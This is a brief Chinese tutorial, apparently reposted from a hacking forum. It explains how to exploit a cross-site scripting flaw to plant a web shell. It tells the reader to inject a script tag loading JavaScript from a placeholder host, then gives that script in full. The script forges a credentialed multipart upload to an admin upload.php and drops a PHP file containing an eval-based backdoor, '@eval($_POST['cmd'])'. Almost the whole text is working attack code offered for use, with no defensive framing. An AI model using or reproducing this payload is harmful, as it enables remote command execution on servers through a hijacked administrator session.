1、找到存在xss的地方提交代码:例如:<script src=http://xxx.com/js.js></script>;
2、构造该js.
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
else if (window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions);
} catch(e) {}
}
}
xmlhttp=request;
var url= "http://www.xxx.com/admin/upload.php";//这里是上传位置
var params="-----------------------------223972503529236\r\n"+
"Content-Disposition: form-data; name=\"title\"\r\n"+
"\r\n"+
"\r\n"+
"-----------------------------223972503529236\r\n"+
"Content-Disposition: form-data; name=\"name\"\r\n"+
"\r\n"+
"\r\n"+
"-----------------------------223972503529236\r\n"+
"Content-Disposition: form-data; name=\"file\"; filename=\"yjh.php\"\r\n"+
"Content-Type: application/octet-stream\r\n"+
"\r\n"+
"<?php @eval($_POST[\'cmd\'])?>\r\n"+
"-----------------------------223972503529236--\r\n";//这些信息可以通过本地架设后台上传点抓包获得。
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------223972503529236");
xmlhttp.withCredentials = "true";
var aBody = new Uint8Array(params.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = params.charCodeAt(i);
xmlhttp.send(new Blob([aBody])); 转自:F4CK